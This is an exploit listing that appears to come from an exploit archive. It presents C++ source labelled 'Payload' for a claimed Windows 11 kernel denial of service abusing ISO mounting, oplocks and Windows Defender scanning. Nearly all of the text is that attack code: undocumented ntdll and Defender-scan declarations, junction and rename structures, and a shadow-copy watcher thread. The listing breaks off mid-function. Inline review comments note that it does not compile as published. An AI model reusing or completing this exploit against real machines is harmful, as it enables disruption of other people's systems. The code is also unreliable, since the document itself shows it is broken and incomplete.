## https://sploitus.com/exploit?id=PACKETSTORM:223817
==================================================================================================================================
| # Title : Windows Kernel Logical Denial of Service via ISO Mount + Oplock Deserialization |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : Windows 11 25H2 (Build 26200) and later |
==================================================================================================================================
[+] Summary : A Logical Denial of Service (LDoS) vulnerability in Windows 11 25H2 (Build 26200) that causes permanent kernel state corruption through ISO mounting, oplocks, and Windows Defender scanning.
[+] Payload :
#define _CRT_SECURE_NO_WARNINGS
#define _WIN32_DCOM
#include <iostream>
#include <Windows.h>
#include <Psapi.h>
#include <winternl.h>
#include <conio.h>
#include <ntstatus.h>
#include <virtdisk.h>
#include <shlwapi.h>
#include <initguid.h>
#include <ole2.h>
#include <comdef.h>
#include <taskschd.h>
#include <bcrypt.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#pragma comment(lib, "kernel32.lib")
#pragma comment(lib, "bcrypt.lib")
#pragma comment(lib, "taskschd.lib")
#pragma comment(lib, "comsupp.lib")
#pragma comment(lib, "virtdisk.lib")
#pragma comment(lib, "ntdll.lib")
#pragma comment(lib, "Rpcrt4.lib")
#pragma comment(lib, "shlwapi.lib")
// Path handed to MpScanStart as the scan target (see WDStartScan); where it is filled in is outside this excerpt.
wchar_t zippath[MAX_PATH] = { 0 };
// Presumably the ntdll module handle used to resolve the _Nt* pointers declared below; the assignment is not in this excerpt.
HMODULE ntdllhm = NULL;
// Event, exit flag and scratch buffer shared with some "poseidon" worker; none of the visible functions touch them.
HANDLE g_poseidonevent = NULL;
bool g_poseidonexit = false;
char g_poseidonbuf[0x1000] = { 0 };
// NOTE(review): a 2-element array with six initialisers is ill-formed C++ ("too many initializers",
// MSVC C2078), so the listing does not build as published. rawData is not referenced in this excerpt.
unsigned char rawData[2] = {
0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
// Function pointers for ntdll exports. They start out NULL and are assigned outside this excerpt
// (presumably via GetProcAddress on ntdllhm — confirm); the callers below dereference them without a
// NULL check, so a failed resolution would crash rather than fail cleanly.
// FILE_INFORMATION_CLASS in these prototypes is the winternl.h type, not custom_defs' copy.
NTSTATUS(WINAPI* _NtSetInformationFile)(
HANDLE FileHandle,
PIO_STATUS_BLOCK IoStatusBlock,
PVOID FileInformation,
ULONG Length,
FILE_INFORMATION_CLASS FileInformationClass
) = NULL;
// Declared but not called anywhere in the visible code.
NTSTATUS(WINAPI* _NtDeleteFile)(
_In_ POBJECT_ATTRIBUTES ObjectAttributes
) = NULL;
// Used by ShadowCopyFinderThread to open the \Device object directory.
NTSTATUS(WINAPI* _NtOpenDirectoryObject)(
PHANDLE DirectoryHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes
) = NULL;
// Enumerates an object directory; Context carries the enumeration position between calls and
// STATUS_MORE_ENTRIES signals that Buffer was too small for the remaining entries.
NTSTATUS(WINAPI* _NtQueryDirectoryObject)(
HANDLE DirectoryHandle,
PVOID Buffer,
ULONG Length,
BOOLEAN ReturnSingleEntry,
BOOLEAN RestartScan,
PULONG Context,
PULONG ReturnLength
) = NULL;
// Declared but not called anywhere in the visible code.
NTSTATUS(WINAPI* _NtQueryInformationFile)(
HANDLE FileHandle,
PIO_STATUS_BLOCK IoStatusBlock,
PVOID FileInformation,
ULONG Length,
FILE_INFORMATION_CLASS FileInformationClass
) = NULL;
#define RtlOffsetToPointer(Base, Offset) ((PUCHAR)(((PUCHAR)(Base)) + ((ULONG_PTR)(Offset))))
// Hand-copied NT definitions. They live in a namespace because winternl.h (included above) already
// declares its own FILE_INFORMATION_CLASS; the call site in MoveToTempDir casts
// custom_defs::FileRenameInformationEx back to the SDK type.
namespace custom_defs {
// Enumerators are positional from 0; a missing or surplus entry shifts every later value, so compare
// against an SDK/phnt listing before relying on a specific class. Not referenced in the visible code.
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemPathInformation,
SystemProcessInformation,
SystemCallCountInformation,
SystemDeviceInformation,
SystemProcessorPerformanceInformation,
SystemFlagsInformation,
SystemCallTimeInformation,
SystemModuleInformation,
SystemLocksInformation,
SystemStackTraceInformation,
SystemPagedPoolInformation,
SystemNonPagedPoolInformation,
SystemHandleInformation,
SystemObjectInformation,
SystemPageFileInformation,
SystemVdmInstemulInformation,
SystemVdmBopInformation,
SystemFileCacheInformation,
SystemPoolTagInformation,
SystemInterruptInformation,
SystemDpcBehaviorInformation,
SystemFullMemoryInformation,
SystemLoadGdiDriverInformation,
SystemUnloadGdiDriverInformation,
SystemTimeAdjustmentInformation,
SystemSummaryMemoryInformation,
SystemMirrorMemoryInformation,
SystemPerformanceTraceInformation,
SystemObsolete0,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegistryQuotaInformation,
SystemExtendServiceTableInformation,
SystemPrioritySeparation,
SystemVerifierAddDriverInformation,
SystemVerifierRemoveDriverInformation,
SystemProcessorIdleInformation,
SystemLegacyDriverInformation,
SystemCurrentTimeZoneInformation,
SystemLookasideInformation,
SystemTimeSlipNotification,
SystemSessionCreate,
SystemSessionDetach,
SystemSessionInformation,
SystemRangeStartInformation,
SystemVerifierInformation,
SystemVerifierThunkExtend,
SystemSessionProcessInformation,
SystemLoadGdiDriverInSystemSpace,
SystemNumaProcessorMap,
SystemPrefetcherInformation,
SystemExtendedProcessInformation,
SystemRecommendedSharedDataAlignment,
SystemComPlusPackage,
SystemNumaAvailableMemory,
SystemProcessorPowerInformation,
SystemEmulationBasicInformation,
SystemEmulationProcessorInformation,
SystemExtendedHandleInformation,
SystemLostDelayedWriteInformation,
SystemBigPoolInformation,
SystemSessionPoolTagInformation,
SystemSessionMappedViewInformation,
SystemHotpatchInformation,
SystemObjectSecurityMode,
SystemWatchdogTimerHandler,
SystemWatchdogTimerInformation,
SystemLogicalProcessorInformation,
SystemWow64SharedInformationObsolete,
SystemRegisterFirmwareTableInformationHandler,
SystemFirmwareTableInformation,
SystemModuleInformationEx,
SystemVerifierTriageInformation,
SystemSuperfetchInformation,
SystemMemoryListInformation,
SystemFileCacheInformationEx,
SystemThreadPriorityClientIdInformation,
SystemProcessorIdleCycleTimeInformation,
SystemVerifierCancellationInformation,
SystemProcessorPowerInformationEx,
SystemRefTraceInformation,
SystemSpecialPoolInformation,
SystemProcessIdInformation,
SystemErrorPortInformation,
SystemBootEnvironmentInformation,
SystemHypervisorInformation,
SystemVerifierInformationEx,
SystemTimeZoneInformation,
SystemImageFileExecutionOptionsInformation,
SystemCoverageInformation,
SystemPrefetchPatchInformation,
SystemVerifierFaultsInformation,
SystemSystemPartitionInformation,
SystemSystemDiskInformation,
SystemProcessorPerformanceDistribution,
SystemNumaProximityNodeInformation,
SystemDynamicTimeZoneInformation,
SystemCodeIntegrityInformation,
SystemProcessorMicrocodeUpdateInformation,
SystemProcessorBrandString,
SystemVirtualAddressInformation,
SystemLogicalProcessorAndGroupInformation,
SystemProcessorCycleTimeInformation,
SystemStoreInformation,
SystemRegistryAppendString,
SystemAitSamplingValue,
SystemVhdBootInformation,
SystemCpuQuotaInformation,
SystemNativeBasicInformation,
SystemErrorPortTimeouts,
SystemLowPriorityIoInformation,
SystemTpmBootEntropyInformation,
SystemVerifierCountersInformation,
SystemPagedPoolInformationEx,
SystemSystemPtesInformationEx,
SystemNodeDistanceInformation,
SystemAcpiAuditInformation,
SystemBasicPerformanceInformation,
SystemQueryPerformanceCounterInformation,
SystemSessionBigPoolInformation,
SystemBootGraphicsInformation,
SystemScrubPhysicalMemoryInformation,
SystemBadPageInformation,
SystemProcessorProfileControlArea,
SystemCombinePhysicalMemoryInformation,
SystemEntropyInterruptTimingInformation,
SystemConsoleInformation,
SystemPlatformBinaryInformation,
SystemPolicyInformation,
SystemHypervisorProcessorCountInformation,
SystemDeviceDataInformation,
SystemDeviceDataEnumerationInformation,
SystemMemoryTopologyInformation,
SystemMemoryChannelInformation,
SystemBootLogoInformation,
SystemProcessorPerformanceInformationEx,
SystemCriticalProcessErrorLogInformation,
SystemSecureBootPolicyInformation,
SystemPageFileInformationEx,
SystemSecureBootInformation,
SystemEntropyInterruptTimingRawInformation,
SystemPortableWorkspaceEfiLauncherInformation,
SystemFullProcessInformation,
SystemKernelDebuggerInformationEx,
SystemBootMetadataInformation,
SystemSoftRebootInformation,
SystemElamCertificateInformation,
SystemOfflineDumpConfigInformation,
SystemProcessorFeaturesInformation,
SystemRegistryReconciliationInformation,
SystemEdidInformation,
SystemManufacturingInformation,
SystemEnergyEstimationConfigInformation,
SystemHypervisorDetailInformation,
SystemProcessorCycleStatsInformation,
SystemVmGenerationCountInformation,
SystemTrustedPlatformModuleInformation,
SystemKernelDebuggerFlags,
SystemCodeIntegrityPolicyInformation,
SystemIsolatedUserModeInformation,
SystemHardwareSecurityTestInterfaceResultsInformation,
SystemSingleModuleInformation,
SystemAllowedCpuSetsInformation,
SystemVsmProtectionInformation,
SystemInterruptCpuSetsInformation,
SystemSecureBootPolicyFullInformation,
SystemCodeIntegrityPolicyFullInformation,
SystemAffinitizedInterruptProcessorInformation,
SystemRootSiloInformation,
SystemCpuSetInformation,
SystemCpuSetTagInformation,
SystemWin32WerStartCallout,
SystemSecureKernelProfileInformation,
SystemCodeIntegrityPlatformManifestInformation,
SystemInterruptSteeringInformation,
SystemSupportedProcessorArchitectures,
SystemMemoryUsageInformation,
SystemCodeIntegrityCertificateInformation,
SystemPhysicalMemoryInformation,
SystemControlFlowTransition,
SystemKernelDebuggingAllowed,
SystemActivityModerationExeState,
SystemActivityModerationUserSettings,
SystemCodeIntegrityPoliciesFullInformation,
SystemCodeIntegrityUnlockInformation,
SystemIntegrityQuotaInformation,
SystemFlushInformation,
SystemProcessorIdleMaskInformation,
SystemSecureDumpEncryptionInformation,
SystemWriteConstraintInformation,
SystemKernelVaShadowInformation,
SystemHypervisorSharedPageInformation,
SystemFirmwareBootPerformanceInformation,
SystemCodeIntegrityVerificationInformation,
SystemFirmwarePartitionInformation,
SystemSpeculationControlInformation,
SystemDmaGuardPolicyInformation,
SystemEnclaveLaunchControlInformation,
SystemWorkloadAllowedCpuSetsInformation,
SystemCodeIntegrityUnlockModeInformation,
SystemLeapSecondInformation,
SystemFlags2Information,
SystemSecurityModelInformation,
SystemCodeIntegritySyntheticCacheInformation,
SystemFeatureConfigurationInformation,
SystemFeatureConfigurationSectionInformation,
SystemFeatureUsageSubscriptionInformation,
SystemSecureSpeculationControlInformation,
SystemSpacesBootInformation,
SystemFwRamdiskInformation,
SystemWheaIpmiHardwareInformation,
SystemDifSetRuleClassInformation,
SystemDifClearRuleClassInformation,
SystemDifApplyPluginVerificationOnDriver,
SystemDifRemovePluginVerificationOnDriver,
SystemShadowStackInformation,
SystemBuildVersionInformation,
SystemPoolLimitInformation,
SystemCodeIntegrityAddDynamicStore,
SystemCodeIntegrityClearDynamicStores,
SystemDifPoolTrackingInformation,
SystemPoolZeroingInformation,
SystemDpcWatchdogInformation,
SystemDpcWatchdogInformation2,
SystemSupportedProcessorArchitectures2,
SystemSingleProcessorRelationshipInformation,
SystemXfgCheckFailureInformation,
SystemIommuStateInformation,
SystemHypervisorMinrootInformation,
SystemHypervisorBootPagesInformation,
SystemPointerAuthInformation,
SystemSecureKernelDebuggerInformation,
SystemOriginalImageFeatureInformation,
SystemMemoryNumaInformation,
SystemMemoryNumaPerformanceInformation,
SystemCodeIntegritySignedPoliciesFullInformation,
SystemSecureCoreInformation,
SystemTrustedAppsRuntimeInformation,
SystemBadPageInformationEx,
SystemResourceDeadlockTimeout,
SystemBreakOnContextUnwindFailureInformation,
SystemOslRamdiskInformation,
SystemCodeIntegrityPolicyManagementInformation,
SystemMemoryNumaCacheInformation,
SystemProcessorFeaturesBitMapInformation,
SystemRefTraceInformationEx,
SystemBasicProcessInformation,
SystemHandleCountInformation,
SystemRuntimeAttestationReport,
SystemPoolTagInformation2,
SystemCodeIntegrityEndpointSecurityInformation,
MaxSystemInfoClass
} SYSTEM_INFORMATION_CLASS;
// One record per handle as returned by the extended handle query; not referenced in the visible code.
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {
PVOID Object;
HANDLE UniqueProcessId;
HANDLE HandleValue;
ACCESS_MASK GrantedAccess;
USHORT CreatorBackTraceIndex;
USHORT ObjectTypeIndex;
ULONG HandleAttributes;
ULONG Reserved;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
// Handles[1] is the "at least one, NumberOfHandles in total" flexible-array idiom; the buffer must be
// sized accordingly before any index beyond 0 is read. Not referenced in the visible code.
typedef struct _SYSTEM_HANDLE_INFORMATION_EX {
ULONG_PTR NumberOfHandles;
ULONG_PTR Reserved;
_Field_size_(NumberOfHandles) SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;
// Full information-class list so that FileRenameInformationEx (which works out to 65 here:
// FileDirectoryInformation = 1, then consecutive) is available; MoveToTempDir passes that value to
// NtSetInformationFile. As with the enum above, the numbering is positional.
typedef enum _FILE_INFORMATION_CLASS {
FileDirectoryInformation = 1,
FileFullDirectoryInformation,
FileBothDirectoryInformation,
FileBasicInformation,
FileStandardInformation,
FileInternalInformation,
FileEaInformation,
FileAccessInformation,
FileNameInformation,
FileRenameInformation,
FileLinkInformation,
FileNamesInformation,
FileDispositionInformation,
FilePositionInformation,
FileFullEaInformation,
FileModeInformation,
FileAlignmentInformation,
FileAllInformation,
FileAllocationInformation,
FileEndOfFileInformation,
FileAlternateNameInformation,
FileStreamInformation,
FilePipeInformation,
FilePipeLocalInformation,
FilePipeRemoteInformation,
FileMailslotQueryInformation,
FileMailslotSetInformation,
FileCompressionInformation,
FileObjectIdInformation,
FileCompletionInformation,
FileMoveClusterInformation,
FileQuotaInformation,
FileReparsePointInformation,
FileNetworkOpenInformation,
FileAttributeTagInformation,
FileTrackingInformation,
FileIdBothDirectoryInformation,
FileIdFullDirectoryInformation,
FileValidDataLengthInformation,
FileShortNameInformation,
FileIoCompletionNotificationInformation,
FileIoStatusBlockRangeInformation,
FileIoPriorityHintInformation,
FileSfioReserveInformation,
FileSfioVolumeInformation,
FileHardLinkInformation,
FileProcessIdsUsingFileInformation,
FileNormalizedNameInformation,
FileNetworkPhysicalNameInformation,
FileIdGlobalTxDirectoryInformation,
FileIsRemoteDeviceInformation,
FileUnusedInformation,
FileNumaNodeInformation,
FileStandardLinkInformation,
FileRemoteProtocolInformation,
FileRenameInformationBypassAccessCheck,
FileLinkInformationBypassAccessCheck,
FileVolumeNameInformation,
FileIdInformation,
FileIdExtdDirectoryInformation,
FileReplaceCompletionInformation,
FileHardLinkFullIdInformation,
FileIdExtdBothDirectoryInformation,
FileDispositionInformationEx,
FileRenameInformationEx,
FileRenameInformationExBypassAccessCheck,
FileDesiredStorageClassInformation,
FileStatInformation,
FileMemoryPartitionInformation,
FileStatLxInformation,
FileCaseSensitiveInformation,
FileLinkInformationEx,
FileLinkInformationExBypassAccessCheck,
FileStorageReserveIdInformation,
FileCaseSensitiveInformationForceAccessCheck,
FileKnownFolderInformation,
FileStatBasicInformation,
FileId64ExtdDirectoryInformation,
FileId64ExtdBothDirectoryInformation,
FileIdAllExtdDirectoryInformation,
FileIdAllExtdBothDirectoryInformation,
FileStreamReservationInformation,
FileMupProviderInfo,
FileMaximumInformation
} FILE_INFORMATION_CLASS, * PFILE_INFORMATION_CLASS;
}
// Hand-declared types for MpClient.dll's undocumented exports (used by WDStartScan). Only
// MPTHREAT_INFO::ThreatStatus is ever read by this program, so the rest of these layouts is
// unverified; treat field names and array sizes as the author's reconstruction.
typedef HANDLE MPHANDLE;
typedef HANDLE* PMPHANDLE;
typedef ULONG MPTHREAT_ID;
typedef ULONG MPRESOURCE_CLASS;
typedef LPWSTR MP_MIDL_STRING;
typedef enum tagMPTHREAT_TYPE {
MPTHREAT_TYPE_KNOWNBAD = 0,
MPTHREAT_TYPE_BEHAVIOR = 1,
MPTHREAT_TYPE_UNKNOWN = 2,
MPTHREAT_TYPE_KNOWNGOOD = 3,
MPTHREAT_TYPE_NIS = 4,
MPTHREAT_TYPE_MAXVALUE = 4
} MPTHREAT_TYPE;
typedef enum tagMPTHREAT_SOURCE {
MPTHREAT_SOURCE_SCAN = 0,
MPTHREAT_SOURCE_ACTIVE = 1,
MPTHREAT_SOURCE_HISTORY = 2,
MPTHREAT_SOURCE_QUARANTINE = 3,
MPTHREAT_SOURCE_SIGNATURE = 4,
MPTHREAT_SOURCE_STATE = 5,
MPTHREAT_SOURCE_MAXVALUE = 5
} MPTHREAT_SOURCE;
// MPSCAN_TYPE_RESOURCE is the mode WDStartScan requests (scan of an explicit path list).
typedef enum tagMPSCAN_TYPE {
MPSCAN_TYPE_UNKNOWN = 0,
MPSCAN_TYPE_QUICK = 1,
MPSCAN_TYPE_FULL = 2,
MPSCAN_TYPE_RESOURCE = 3,
MPSCAN_TYPE_MAXVALUE = 3
} MPSCAN_TYPE;
typedef enum tagMPTHREAT_ACTION {
MP_THREAT_ACTION_UNKNOWN = 0,
MP_THREAT_ACTION_CLEAN = 1,
MP_THREAT_ACTION_QUARANTINE = 2,
MP_THREAT_ACTION_REMOVE = 3,
MP_THREAT_ACTION_ALLOW = 6,
MP_THREAT_ACTION_USERDEFINED = 8,
MP_THREAT_ACTION_NOACTION = 9,
MP_THREAT_ACTION_BLOCK = 10,
MP_THREAT_ACTION_MAX_VALUE = 10
} MPTHREAT_ACTION;
// NOTE(review): MPTHREAT_SEVERITY, MPTHREAT_CATEGORY and MPTHREAT_STATUS are not defined anywhere in
// this listing; unless a header not shown supplies them, this struct (and the file) does not compile.
// The 10000-/1024-element inline arrays make this a very large structure; MpThreatEnumerate hands
// back a pointer to memory it owns, so the size only matters if the declared layout is wrong.
typedef struct tagMPTHREAT_INFO {
MPTHREAT_ID ThreatID;
GUID DetectionID;
MP_MIDL_STRING Name;
MPTHREAT_TYPE ThreatType;
MPTHREAT_SEVERITY ThreatCriticality;
MPTHREAT_CATEGORY ThreatCategory;
DWORD ThreatShortDescriptionID;
DWORD ThreatAdviseDescriptionID;
MPTHREAT_STATUS ThreatStatus;
DWORD SuggestedActionCount;
MPTHREAT_ACTION SuggestedActionArray[10000];
DWORD ResourceCount;
PVOID ResourceList[1024];
ULARGE_INTEGER ThreatStatusTime;
HRESULT ThreatStatusCode;
DWORD ThreatDetection;
GUID QuarantineGuid;
DWORD ExecutionStatus;
PVOID Data;
DWORD State;
MP_MIDL_STRING DetectionUser;
DWORD DetectionSource;
MP_MIDL_STRING ProcessName;
DWORD DetectionOrigin;
DWORD reserved1;
ULARGE_INTEGER DetectionTime;
DWORD PreExecutionStatus;
ULARGE_INTEGER RemediationTime;
DWORD PostExecutionStatus;
BOOL CriticalFailure;
DWORD NonCriticalReason;
MP_MIDL_STRING RemediationUser;
DWORD RemediationResourceCount;
PVOID RemediationResourceList[1024];
BOOL FailureResolved;
DWORD ResolvedReason;
DWORD AdditionalActions;
DWORD ResolvedActions;
DWORD dwThreatStatusFlag;
} MPTHREAT_INFO, * PMPTHREAT_INFO;
// One scan target: Scheme ("file" in WDStartScan) plus a path.
typedef struct tagMPRESOURCE_INFO {
MP_MIDL_STRING Scheme;
MP_MIDL_STRING Path;
MPRESOURCE_CLASS Class;
} MPRESOURCE_INFO, * PMPRESOURCE_INFO;
typedef struct tagMPSCAN_RESOURCES {
DWORD dwResourceCount;
PMPRESOURCE_INFO pResourceList;
} MPSCAN_RESOURCES, * PMPSCAN_RESOURCES;
// Shape of the callback record MpScanStart takes; "v4" is a placeholder name from the author's
// reverse engineering, not a documented field.
typedef struct tagMPCALLBACK_INFO {
void* CallbackHandler;
__int64 v4;
} MPCALLBACK_INFO, * PMPCALLBACK_INFO;
// ntifs.h layouts below (not referenced in the visible code unless noted).
typedef struct _FILE_BASIC_INFORMATION {
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
ULONG FileAttributes;
} FILE_BASIC_INFORMATION, * PFILE_BASIC_INFORMATION;
// Used by MoveToTempDir with FileRenameInformationEx, where the union member in effect is Flags.
// FileName is a counted (FileNameLength bytes), not NUL-terminated, flexible array.
typedef struct _FILE_RENAME_INFORMATION {
union {
BOOLEAN ReplaceIfExists;
ULONG Flags;
} DUMMYUNIONNAME;
HANDLE RootDirectory;
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_RENAME_INFORMATION, * PFILE_RENAME_INFORMATION;
// Standard reparse-point buffer; CreateJunction fills in MountPointReparseBuffer (a junction).
typedef struct _REPARSE_DATA_BUFFER {
ULONG ReparseTag;
USHORT ReparseDataLength;
USHORT Reserved;
union {
struct {
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
ULONG Flags;
WCHAR PathBuffer[1];
} SymbolicLinkReparseBuffer;
struct {
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
WCHAR PathBuffer[1];
} MountPointReparseBuffer;
struct {
UCHAR DataBuffer[1];
} GenericReparseBuffer;
} DUMMYUNIONNAME;
} REPARSE_DATA_BUFFER, * PREPARSE_DATA_BUFFER;
// Offset of the payload in the non-GUID buffer above (8 bytes); CreateJunction uses it to size its allocation.
#define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer)
// NOTE(review): winnt.h already defines this name as the offset of the GUID-carrying header (24 bytes);
// redefining it as 8 presumably draws a macro-redefinition warning and would be wrong for a GUID
// buffer. It is not used in the visible code.
#define REPARSE_GUID_DATA_BUFFER_HEADER_SIZE 0x8
typedef struct _FILE_DISPOSITION_INFORMATION_EX {
ULONG Flags;
} FILE_DISPOSITION_INFORMATION_EX, * PFILE_DISPOSITION_INFORMATION_EX;
// One entry of an object-manager directory listing as returned by NtQueryDirectoryObject; both
// fields are counted strings, so NUL termination is not guaranteed by the type.
typedef struct _OBJECT_DIRECTORY_INFORMATION {
UNICODE_STRING Name;
UNICODE_STRING TypeName;
} OBJECT_DIRECTORY_INFORMATION, * POBJECT_DIRECTORY_INFORMATION;
// Singly linked list node owning a malloc'ed, NUL-terminated device name; built by
// RetrieveCurrentVSSList and released by DestroyVSSNamesList.
struct LLShadowVolumeNames {
wchar_t* name;
LLShadowVolumeNames* next;
};
// Releases every node of a list built by RetrieveCurrentVSSList, including each node's name buffer.
// Accepts NULL (no-op). Both the node and its name must have come from malloc.
void DestroyVSSNamesList(LLShadowVolumeNames* First) {
    for (LLShadowVolumeNames* node = First; node != nullptr;) {
        LLShadowVolumeNames* const following = node->next;
        free(node->name);
        free(node);
        node = following;
    }
}
// Collects the names of every \Device\HarddiskVolumeShadowCopy* object that exists right now.
// ShadowCopyFinderThread uses the result as a baseline so that a shadow copy created *later* can be
// told apart from pre-existing ones.
//   hobjdir      handle to the \Device object directory, opened with DIRECTORY_QUERY
//   criticalerr  set to true on failure; the caller must check it, because NULL is also the
//                legitimate "no shadow copies present" result
//   vscnumber    receives the number of names collected
//   errorcode    receives a Win32 error code on failure
// Returns a malloc'ed singly linked list (release with DestroyVSSNamesList) or NULL.
LLShadowVolumeNames* RetrieveCurrentVSSList(HANDLE hobjdir, bool* criticalerr, int* vscnumber, DWORD* errorcode) {
if (!criticalerr || !vscnumber || !errorcode)
return NULL;
*vscnumber = 0;
ULONG scanctx = 0;
// Initial buffer: one header plus room for two maximal UNICODE_STRINGs; grown below whenever the
// kernel answers STATUS_MORE_ENTRIES.
ULONG reqsz = sizeof(OBJECT_DIRECTORY_INFORMATION) + (UNICODE_STRING_MAX_BYTES * 2);
ULONG retsz = 0;
OBJECT_DIRECTORY_INFORMATION* objdirinfo = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz);
if (!objdirinfo) {
printf("[!] Failed to allocate buffer for object manager directory query.\n");
*criticalerr = true;
*errorcode = ERROR_NOT_ENOUGH_MEMORY;
return NULL;
}
ZeroMemory(objdirinfo, reqsz);
NTSTATUS stat = STATUS_SUCCESS;
do {
// NOTE(review): scanctx is never reset and RestartScan is FALSE, so after STATUS_MORE_ENTRIES the
// retry resumes *after* the entries that are freed just below; a shadow copy listed in a partial
// result would be silently dropped from the baseline. ShadowCopyFinderThread resets its context
// on every pass instead.
stat = _NtQueryDirectoryObject(hobjdir, objdirinfo, reqsz, FALSE, FALSE, &scanctx, &retsz);
if (stat == STATUS_SUCCESS)
break;
else if (stat != STATUS_MORE_ENTRIES) {
printf("[!] NtQueryDirectoryObject failed with 0x%0.8X\n", stat);
*criticalerr = true;
*errorcode = RtlNtStatusToDosError(stat);
// objdirinfo is leaked on this path.
return NULL;
}
free(objdirinfo);
reqsz += sizeof(OBJECT_DIRECTORY_INFORMATION) + 0x100;
objdirinfo = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz);
if (!objdirinfo) {
printf("[!] Failed to allocate required buffer to query object manager directory.\n");
*criticalerr = true;
*errorcode = ERROR_NOT_ENOUGH_MEMORY;
return NULL;
}
ZeroMemory(objdirinfo, reqsz);
} while (1);
// All-zero template entry used to detect the end of the returned array; malloc is not NULL-checked
// before ZeroMemory.
void* emptybuff = malloc(sizeof(OBJECT_DIRECTORY_INFORMATION));
ZeroMemory(emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION));
LLShadowVolumeNames* LLVSScurrent = NULL;
LLShadowVolumeNames* LLVSSfirst = NULL;
// Walks entries until an all-zero one. This relies on NtQueryDirectoryObject terminating the array
// with a zeroed entry (presumably always the case — confirm); emptybuff is only freed when that
// terminator is reached.
for (ULONG i = 0; i < ULONG_MAX; i++) {
if (memcmp(&objdirinfo[i], emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION)) == 0) {
free(emptybuff);
break;
}
// TypeName.Buffer is handed to _wcsicmp as a NUL-terminated string; the UNICODE_STRING type does
// not guarantee that (it works if the kernel pads the returned names, as it appears to here).
if (_wcsicmp(L"Device", objdirinfo[i].TypeName.Buffer) == 0) {
wchar_t cmpstr[] = { L"HarddiskVolumeShadowCopy" };
// Name must be at least the prefix plus one more character (the copy number); the compare below
// covers the prefix bytes without the NUL (sizeof(cmpstr) - sizeof(wchar_t)).
if (objdirinfo[i].Name.Length >= sizeof(cmpstr)) {
if (memcmp(cmpstr, objdirinfo[i].Name.Buffer, sizeof(cmpstr) - sizeof(wchar_t)) == 0) {
(*vscnumber)++;
// The two branches are the same "allocate node, copy Name" sequence for a subsequent node and the
// first node respectively. The extra sizeof(wchar_t) plus ZeroMemory supplies the NUL terminator
// that memmove does not copy.
if (LLVSScurrent) {
LLVSScurrent->next = (LLShadowVolumeNames*)malloc(sizeof(LLShadowVolumeNames));
if (!LLVSScurrent->next) {
printf("[!] Failed to allocate memory.\n");
*criticalerr = true;
*errorcode = ERROR_NOT_ENOUGH_MEMORY;
DestroyVSSNamesList(LLVSSfirst);
free(objdirinfo);
return NULL;
}
ZeroMemory(LLVSScurrent->next, sizeof(LLShadowVolumeNames));
LLVSScurrent = LLVSScurrent->next;
LLVSScurrent->name = (wchar_t*)malloc(objdirinfo[i].Name.Length + sizeof(wchar_t));
if (!LLVSScurrent->name) {
printf("[!] Failed to allocate memory.\n");
*errorcode = ERROR_NOT_ENOUGH_MEMORY;
*criticalerr = true;
DestroyVSSNamesList(LLVSSfirst);
free(objdirinfo);
return NULL;
}
ZeroMemory(LLVSScurrent->name, objdirinfo[i].Name.Length + sizeof(wchar_t));
memmove(LLVSScurrent->name, objdirinfo[i].Name.Buffer, objdirinfo[i].Name.Length);
} else {
LLVSSfirst = (LLShadowVolumeNames*)malloc(sizeof(LLShadowVolumeNames));
if (!LLVSSfirst) {
printf("[!] Failed to allocate memory.\n");
*errorcode = ERROR_NOT_ENOUGH_MEMORY;
*criticalerr = true;
// LLVSSfirst is NULL here, so this call is a harmless no-op.
DestroyVSSNamesList(LLVSSfirst);
free(objdirinfo);
return NULL;
}
ZeroMemory(LLVSSfirst, sizeof(LLShadowVolumeNames));
LLVSScurrent = LLVSSfirst;
LLVSScurrent->name = (wchar_t*)malloc(objdirinfo[i].Name.Length + sizeof(wchar_t));
if (!LLVSScurrent->name) {
printf("[!] Failed to allocate memory.\n");
*errorcode = ERROR_NOT_ENOUGH_MEMORY;
*criticalerr = true;
DestroyVSSNamesList(LLVSSfirst);
free(objdirinfo);
return NULL;
}
ZeroMemory(LLVSScurrent->name, objdirinfo[i].Name.Length + sizeof(wchar_t));
memmove(LLVSScurrent->name, objdirinfo[i].Name.Buffer, objdirinfo[i].Name.Length);
}
}
}
}
}
// Note: emptybuff is not freed on the error returns above (only when the terminator is found).
free(objdirinfo);
return LLVSSfirst;
}
// Thread entry point. Busy-waits until a \Device\HarddiskVolumeShadowCopy* object appears that was
// not present when the thread started, then polls until "<device>\Windows" can be opened, and
// finally copies the device path into fullvsspath.
//   fullvsspath  optional wchar_t buffer of at least MAX_PATH characters (no length is passed, so a
//                smaller buffer would overflow); NULL skips the copy
// Returns a Win32 error code (ERROR_SUCCESS on success). Never returns while no new shadow copy
// appears: neither polling loop has a timeout or a sleep, so from a monitoring standpoint this
// thread pins a core and issues object-directory queries continuously until the event it waits for
// happens.
DWORD WINAPI ShadowCopyFinderThread(void* fullvsspath) {
wchar_t devicepath[] = L"\\Device";
UNICODE_STRING udevpath = { 0 };
